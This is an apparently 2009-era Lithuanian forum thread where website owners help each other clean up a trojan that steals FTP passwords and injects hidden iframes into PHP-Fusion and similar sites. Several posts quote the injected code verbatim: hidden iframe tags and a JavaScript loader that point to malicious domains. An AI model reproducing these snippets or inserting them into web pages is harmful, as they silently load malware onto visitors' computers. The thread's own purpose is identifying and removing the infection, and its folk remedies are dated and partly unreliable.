---

Taigi, norėčiau informuoti, kad internete pasklido backdoor trojanai.

Principas - užkrečiami Jūsų tinklapio failai. Užkrėtimų pavyzdys:


Bei:


Redirectas pirmojo adreso eina į:


Per kelias pastarasias dienas sugebėjau patekti į 3 LIETUVIŠKUS taip apkrėstus saitus. Bijau dabar sumeluoti, bet n-design.lt buvo tame sąraše irgi.

Kaip suprantu backdoor'as išnaudoja kartu ir Internet Explorer 7 ( o gal ir 8) saugumo kažkokią tai spragą, tad nerekomenduočiau eiti į nepatikimus saitus su IE7 artimiausiu metu.

Jeigu visgi tai padarysite, rizikuojate apskrėsti Malware virusu, iš serijos:

arba:


Kaip softą naikinantį šiuos virusus rekomenduočiau išbandyti:
malwarebytes anti-malware
NOD32 viruso tinkamai pašalinti nesugeba. :)

---

Reikėjo geriau parašyti kaip apsisaugoti nuo tokių virusų :)

---

Jooo, draugas prašė išnaikint padėt tai locale failuose (ne vien locale) būna jis aš atkurdavau eilutes su default fusion'o failas. :) Ir chmod 444 bereods. :D

---

Būtų įdomu sužinoti ar chmod 644 tikrai veikia. Aš kažkam siūliau šitą variantą, bet efektyvumo tai ir neparašė ;D

---

Nuo šito VIRUSO apsisaugoti galima labai paprasta. Tiesog reikia kad jūsų FTP kliente neįsimintu slaptažodžio, kadangi šitas virusas veikia ir ieško po visas FTP programas slaptažodžius kurios programos įsimina. AVG šita virusa pašalina tinkamai jei ką domina. :)

---

Kai ateinu į saitą ir pamau, kad nuo višaus yra labai didelis tarpas jau suprantu, kad apkrėtas, dažniausiai būna, maincore.php pačiam gale, locale/ forum/main.php admin/main.php dar index.php

---

O gal kas žinot ar yra ant IE bugfix'as koks, kad pataisytų šitą malware. Ir gal kas žinot listą programų kurias patikrina, t.y. pvz. ar FZ senesnes versijas ir pan?

---

Abejoju ar dabar yra IE fix'as. Vėliau webmasteriai pastebėję šį virusą, padarys ir fix'ą. ( O gal jau jį kuria. :) )

---

Jo kaip ištrinti tą virusą draugo saite pasklido tai užblockino mozilą

---

1.Pašalink virusą iš kompo.
2.Pasikeisk visus FTP ir Direct Admin slaptažodžius.
3.Atsiųsk saito failus ir pašalink užkrėstą kodą.

---

http://www.delfi.lt/news/economy...d=23184420

".. „Kaspersky Lab.“ saugumo ekspertai perspėja apie naujo tipo kompiuterių kenkėjų, kurie pasinaudoja nekaltais interneto portalais, bangą. Jie sparčiai plinta, nes išnaudoja ir „Google“ paieškos sistemą.

„Kibernetiniai nusikaltėliai braunasi į nepakankamai apsaugotas interneto svetaines, kurias paverčia virusų skleidėjomis. Virusu vartotojas gali užsikrėsti tiesiog apsilankęs užgrobtoje svetainėje“, – pranešime spaudai cituojamas programinės įrangos platintojo „Atviros informacinės sistemos“ saugumo specialistas Andrius Šaveiko – „Per naršyklę iš tinklalapio patekęs į vartotojo kompiuterį, kenkėjas renka konfidencialią informaciją ir prisijungimo prie FTP serverių duomenis, kad galėtų apkrėsti kitus tinklalapius. Taip užgrobtų svetainių ir kompiuterių ratas sparčiai plečiasi“.

Pavojingiausias ir plačiausiai žinomas toks per interneto svetaines plintantis kenkėjas – Trojos arklys „Gumblar.a“. Jis per birželio mėnesį plito devynis kartus aktyviau nei gegužę ir užkrėtė daugiau nei 27 tūkst. interneto svetainių. Nuo šio kenkėjo nukentėjo pačios įvairiausios paskirties svetainės – verslo įmonių, restoranų, nevyriausybinių organizacijų, asmeniniai ir kiti tinklalapiai.


Pasak A. Šaveiko, „Gumblar.a“ virusas savo plitimui išnaudoja ir „Google“ paieškos sistemą. Jis apkrėstą svetainę optimizuoja taip, kad ji būtų pateikiama kuo aukštesnėje „Google“ paieškos rezultatų pozicijoje, o dėl to daugiau vartotojų, paspaudę nuorodą, patektų į nesaugius tinklalapius bei apkrėstų savo kompiuterį.

„Kai šį Trojos arklį pasigauna vartotojas, yra daug šansų, kad jis gaus visą „puokštę“ kitų virusų. Kenkėjas taip pat užblokuoja antivirusines programas ir priėjimą prie jų tinklalapių, o kompiuteryje įrašo netikrą antivirusinę programinę įrangą“, – aiškino „Atviros informacinės sistemos“ specialistas. „Be to, apkrėsto kompiuterio vartotojas „Google“ paieškos sistemoje uždavęs vienokią užklausą, bus nukreipiamas į visai su užklausa nesusijusius rezultatus, vedančius į kitus užkrėstus tinklalapius“.

Ekspertų vertinimų, „Gumblar.a“ ir kiti analogiški kenkėjai yra pakankamai bjaurūs ir pavojingi, ypač jeigu ir toliau išlaikys dabartines plitimo tendencijas. Neturinčiam tinkamos saugumo programos vartotojui gali tapti pavojinga užsukti net į gerai pažįstamus tinklalapius, kuriuose lankėsi vakar, nes jie jau gali būti apkrėsti. Be to, kenkėjai renka konfidencialią vartotojo informaciją, prisijungimo prie bankų kodus ir pan. .."
©Delfi.lt

---

Čia ne vienintelis toks yra man pasitaikė ir kitas kuris įdedą į index.php failus pačiame gale tiesiog automatiškai prisirašo ir tu nežinai iš kur jis atsirado.
Na, o pats kodas atrodo taip:



><iframe src="http://davajtemnedenegsejchas.com/spl1/?f115c845296f7ba3144dc004201e3f86" width=1 height=1 style="visibility:hidden"></iframe>

paryškinau ta kodą kuri įdeda į index.php, nesvarbu ar jis yra prirašytas ar tuščias tiesiog ji prirašo.

Na, o aš juos išnaikinau tiesiog peržiūrėdamas visus index.php failus ir tuos kodus ištryniau.

---

Ne tik į index.php, bet ir į kitus įsirašo, ir ne tik tokiais URL. Tiesiog reiktų Notepad++ su "find in files" <iframe paieška duoti per visus saito failus.

---

Pas mane buvo vienas tarp kas kokio kito failo, bet neprisimenu, o php-fusion failus pražiūrėjau visus tai tik toks kodas te buvo ir tarp index.php failų.

---

Aš tai apskritai šiandien labai supykau ant MicroSHIDO kad jis sugeba tokias milžiniškas security holes palikti ant savo softo....

---

Pamačiau temą ir juoktis pradėjau... Šitas virusas siaučia jau geri 3mėnesiai tik antvirusinės updeit'ų šitam neturėjo tik prieš mėnesį juos įsirengė, bet visgi matau kaip visad neupdeitinat antvirusinių. :D
Aš į php-f saitus jau net nevaikštau nes kas 3saitas sėdi su tokiu virusiuku. ;)

---

Bent jau nod'o 32 net naujausia versija negaudo laiku kai reikia. Praleidžia infiltruotis į sistema. Ir išnaikinti NOD nesugeba gerai manau. Malwarebytes' Anti-Malware šitas gerai naikina.

---

Nežinau kaip tau čia taip, bet turiu AdAware kuris puikiai išnaikina, o ponaitis ESS 4 perspėja kada reikia pasinaudoti geriausiu desktop draugu AdAware. ;)

---

Man kažkas panasaus buvo atsiradę maincore.php faile ?|

---

Taigi jis lenda į visur kas susiję su index.php šiuo atveju index.php>maincore.php

---

as galvojau kas per sudas su mano webu darosi... visada sugadintas index.php maincore.php forum/index.php ir administratio/index.php
ir visuose buna iframe


dabar viskas aisku :)
aciu uz info dabar zinosiu :)

---

Man susigadindavo mainteriance pastoviai... žinostim, žinosim.

---

Viena iš pirmųjų šio grobuonies aukų ir buvau aš lietuvoje, o gal net ir visa ko pradininkas. ?| Vienu žodžiu viskas prasidėjo nuo paprastų dainų siuntimosi iš grizzlis.lt. :)

---

Dar daugiau informacijos:
Symantec oficialiai pranešė, kad egzistuoja kritinis Adobe flash pažeidžiamumas.

Situacija yra gan rimta kadangi hakeriai šį pažeidžiamumą gali labai lengvai išnaudoti tiesiog reikia auką priversti atsidaryti užkrėsta tinklapį arba atidaryti el.paštu gauta .PDF formato failą.

Simantec taip pat teigia, kad pažeidžiamumą galima išnaudoti su betkuria programine įranga kuri naudoja flash elementus.

Oficialiame Adobe blog'e teigiama, kad pažeidžiamumas egzistuoja šiuose Adobe produktuose : Adobe Reader, Acrobat 9.1.2, Adobe Flash Player 9, Adobe Flash Player 10. Adobe šiuo metu dirba prie šio pažeidžiamumo ir galime tikėtis, kad greitu metu išleis pataisymų paketus šioms versijoms.

Symantec praneša, kad trojanas pavadinimu Trojan.Pidief.G būtent ir plinta pasinaudodamas šiuo flash pažeidžiamumu. Operacinės sistemos kurios gali būti infekuotos šiuo trojos arkliu yra : Windows XP ir Windows Vista jei yra išjungtas User Account Control (UAC).

Jei norite laikinai apsisaugoti yra rekomenduojama atlikti šiuos veiksmus:


Susiraskite šiuos du failus ir juos pervadinkite:
"%ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll" ir "%ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll".
Taip pat savo interneto naršyklės nustatymuose reikėtu laikinai išjungti Flash funkciją.




Rekomendacija: Nepatartina atidarinėti jokių neaiškių .PDF formato failų ar lankytis nuorodose su .pdf galunėmis pavyzdžiui:

http://www.blogas_tinklapis.com/failas.pdf




Pagal ©KING

---

Nenaudoti IE. Nenaudoti MS produkcijos. Nesukti sau galvos. ;)

---

Na čia nieko nepadarysi nors ir tu antivirusine atsinaujinsi. Pavyzdžiui pas mane yra AVG ir AVG IDENTITY Protection beto dar yra užsakyta teo triguba apsauga na nežinau ar ji padeda ar ne bet kartais ir neileidžia į kai kuriuos tinklapius rašo, kad tinklapis yra nesaugus tai ir neįeisi :)

---

O tai sakykit, kaip mynejo cia kad nod32 neisvalo to virsuo, tai net nevalyti su nobu? ka daryti tada? su kitokia anti-virus programa valyti? ar kaip?

---

Buvo juodai boldu parašyta. Dar kartą kartoju. Šį trojaną išvalo ši programa:
malwarebytes anti-malware

Atsisiųsti ją gali iš:
http://www.malwarebytes.org/mbam...

Užtenka atsisiųsti FREEWARE versiją.

Instaliavę darykite FULL systemą scan'ą.

---

Durni ar kaip? :D Sakau pasakiau kas gali būti naudinga, bet žiūriu mano patarimais nesinaudojama. So WTF I was writing and trying to help you guys?

---

Šis trojanas nepriklausomai nuo naršyklės įlenda į jūsų kompiuterį per PDF. Jeigu naršyklė PDF failus atidarinėja viduje ir jeigu neturite antivirusinės - tai galimas daiktas, kad jūs jau esate užsikrėtę. Kažkada gavau laišką su pranešimu, kad per Adobe Acrobat Reader (PDF Readeris) turi rimtą spragą. Reikia išjungti JavaScript'ą PDF readeryje (Preferences > Advanced > JavaScript). Aš tai išgirdęs tiesiog išinstaliavau šitą programą ir atsisiunčiau kažkokia tai FREE. Tai jei užklysdavau į tokią ifreimais užkrėstą svetainę man tiesiog blogiausiu atveju pasileisdavo tas PDF skaitytuvas su hieroglifais vietoje teksto. O kaip išssigydyti nuo jo? Tiesiog dabar jau betkokia antivirusinė manau susidoroja su šiuo virusu. Po praskanavimo pasikeiskite visus savo žinomų FTP slaptažodžius. Nes tas trojanas renka ftp paswordus ir vėliau prisijungia prie jūsų hostingų ir redaguoja failus įkišdamas tuos iframe.
Žiauriausia buvo kaip tokiu trojanu užsikrėtė vienas iš adminu textadds sistemos. Tai automatiškai visi vartotojai kurie naudojosi ta reklamų apsikeitimo sistema tapo trojano platintojais.

Sėkmės :)

---

Kai iejnu i savo tinklapi reguoja flash playeris...

---

---> Sveiki Stai. Jau koki 1menesi laiko kankinuosi su 1 ikirus virusau, istrinu ir vel po keliu dienu atsiranda...
Keiciau ftp pas ir t.t Gal kas patars ka daryti? Duodu viruso pavizdi
Cia nespauskit, Virusas :)

---

---> cipis padeti? duok skype

---

---> O is kur man zinot ar nepakenksi dar labeu? :D
-----------------------------------------------------
Bet nemanau kad gali pakenkt labeu nei yra pakenkta :D
-----------------------------------------------------
Na nebent Pavogtum ftp su 25lt ;) :o

---

---> neprašau jokiu duomenu... Man ir taip buvo tai susitvarkiau

---

---> I privacia zinute , skype id ;)

---

---> Stai koke beda iframe virusas mano saite, tiagi viusus failus persikeliu i PC paskanuoju su AVG ji randa virusus pasalinu tuos failus ir ikeliu naujus bet praejus kokem taj laiko tarpui wel wirusas ATSIRANDA, ka daryt ? :o

---

---> Bandyk chmod tuos failus į 444.

---

--->

Stai ka dabar raso :|

---

---> includes/multisite_include.php failą ištrynei :)

---

---> Pasalink virusus is svetaines, poto is pc :D o poto pasikeiti visus paswordus ;)

---

---> Db kai tie failai su chmodinti klaidu webe wisur daug daug :D erroru

---

---> tai ne visus reikėjo ;)

---

---> Tai chmodinau tik tuos kur wirusas buwo, bet ikeliau sena maincore.php ir susitvarke viskas :)

---

---> Sveiki tiksliai nzn ar cia rasau. Taciau toks dalykas pas mane yra mano swr.lt domena uzblokavo google.lt as pasalinau ta virusiuka ka dabar daryti kad atblokotu nes laukiu nesulaukiu kol atblokos jau menesis kox gal kaip neatblokoja. girdejau kad reikia rasyti google.lt laiska elektronini taip? padekite kas zinote

---

busiu labai dekingas.

---

O tu nebandei su kita naršyke eiti? Arba dar pažiūrėti ar yra virusas,gal ten iframe,kurio tu taip lengvai nepašalinsi,trynk netrynes vistiek atsiradinės poros dienų tarpe.

---

Supranti as viska apsoliuciai istrines buvau ir direktorija ir is xz.lt domenu ir mysql ir pewr naujo suiinstaliavau pradejau nuo 0 taciau man vistiek uzblokotas

---

Na tai kasnors zinote kaip cia atsiblokoti?

---

Tuoj užsifūdinsi iki bano.

---

Gal tu užsikrėtes esi tipo kaip per naujo įkelį faila ir vel užsikrečia. ;D

---

pritariu AVG be problemų veikia stabiliai ir gretai ir apsaugo nuo tokių dalykų

---

nea as viska istriniau pakeiciau slaptazodzius perskanavau su anivirusine ir vat sukeliau naujus failus vika nuo 0 kaip ainu swr.xz.lt nieko nemeta kaip ainu swr.lt tada ismeta ta lentele kad svetaine laikoma kenkejiska google.lt uzblokavus yra

---

Tai padesite? vakar nesulaukiau atsakymo snd gal sulauksiu

---

Parašyk ir sužinosi.

---

tai vat jai galima linko noriu nes nerandu niekur linko kad google.lt parasyciau

---

---> Kaip gali i mano dtvs sistema, patekti i index faila stai tokia nuoroda: <iframe src="http://a5m.at:8080/index.php" width=110 height=175 style="visibility: hidden"></iframe>
Kiek ziurejau per google cia kazkoks virusas ar panasei, bet kaip jis patenka i tvs, perinstaliuoju viska per nauja ir vistiek atsiranda, tinklapis tada suleteja, avira blokuoja tinklapi net. Kaip atsikratyti sio viruso? KAip jis ten patenka? tas pats ir su php fuison sistema. Beje hostas puslapiai.lt gal del prasto hostingo tiekejo? Mano du saitai jau uzkresti, viska perdarau pernauja, bet uz poros dienu vel sita nesamone atsiranda.

---

---> man su dle irgi buwwo... nzn kaip apsisaugot ir man reiktu...

---

---> Man su dle ir php fusion, kas zino kaip apsisaugoti? Matau cia ne man vienam tokia problema

---

---> Pasikeisk FTP pass, praskenuok PC su AV arba Malwarebytes' Anti-Malware ir panašaus tipo progmamomis laikinai iš FTP programų ištrink pass kurie būni išsaugoti

---

---> reiks bandyti, dekui, kas dar kokiu patarimu turi?:)::):)::)

---

---> Man html irgi randa,perskanuok pc ir keisk pasw

---

---> Microsofto įrankį bandėt? http://www.microsoft.com/downloa...layLang=en Tikrai puikiai atlieka savo darbą..

---

---> o pagrinde i index.php lenda tie virusiniai skriptai? man i wordpress buvo ilindę, tai visuose index, dar header faile buvo.

---

jo jus taip o kaip man padaryti ar parasyti i google.lt kad atblokintu man ta domena

---

Ir mane ta google uzblokino, nebezinau ka daryt tas virusas wis atsiranda ?| nors buvau visus failus naujus ikeles, ir passwordus imetes naujus, tai paaiskins kas nors kaip apsisaugoti nuo sito sudino viruso ? :[

---

nieko neatsitiks jai aštą atsisiunčiau anti virusine ir dar pas mane pc yra avg?

---

kaip istrinti is ftp programu pasw kurie issaugoti? Beje galima verifinti tada google greiciau patikrina,kazkam cia reikejo

---

Krc tas chmod nepadeda nei kiek ...

---

Sitas budas tikrai pades jei nieks nepadeda! 1)perinstaliuot windowsus 2)per backup ar ka ten atnaujint web,nes rankiniu gal ka paliksit 3)pasw pakeisti

---

nieko neatsitiks?

---

Kiek as zinau negalima 2 antivirusiu tureti kompe nes ziauriai uzlagins, nebent viena is ju aad-aware ar panasaus stiliaus

MANO KLAUSIMAS :

Pas mane buvo sis virusas, as ji panaikinau, net google cia patvirtino http://www.google.com/safebrowsi...&hl=lt , kad to viruso nera patvirtino 09men 05d, bet kai ziuriu googlej tai dar raso : Tai tikriausiai žalinga Jūsų kompiuteriui. http://www.google.lt/#hl=lt&sour...c2950ca4a6

Kodel taip raso, jei googlas patvirtino kad virusas pasalintas?

---

man tas pats buvo ~1mėn dar taip domenas buvo užbanintas bet po to dingo

---

Kur matai, kad praėjo 90 dienų? :D Lauk trys mėnesius.

---

Paskutinį kartą „Google“ šioje svetainėje lankėsi 2009-09-05, ir paskutinį kartą įtartinas turinys rastas šioje svetainėje 2009-08-28.

---

Suprask, kad ir jeigu google joje lankėsi ir neberado tu virusų, tai vistiek turi 90 dienų praeiti kaip garantas kad ir vėl nepasirodė jis.

---

Pas mane kazkodel rodo webe yra virusas issikeliu praskanuot NERA Mistika kazkokia :D

---

nera viruso, pasalinau ir google patvirtino.Reikia dar pora dienu palaukt

---

Krc Ka daryt Webe meta virusa iframer. isikeliu failus praskanuoju NIEKO NERA. Ka daryt? :|

---

stai koki koda aptikau senden labai daug failu buvo uzkresta locale failai ir administrator index.php radau tokius kodus.
<script type=\"text/javascript\" language=\"javascript\" > (function () { var wm = document.createElement('iframe'); wm.src = 'http://qevywmuv.ru/count28.php'; wm.style.position = 'absolute'; wm.style.border = '0'; wm.style.height = '1px'; wm.style.width = '1px'; wm.style.left = '1px'; wm.style.top = '1px'; if (!document.getElementById('wm')) { document.write('<div id=\'wm\'></div>'); document.getElementById('wm').appendChild(wm); }})();</script>";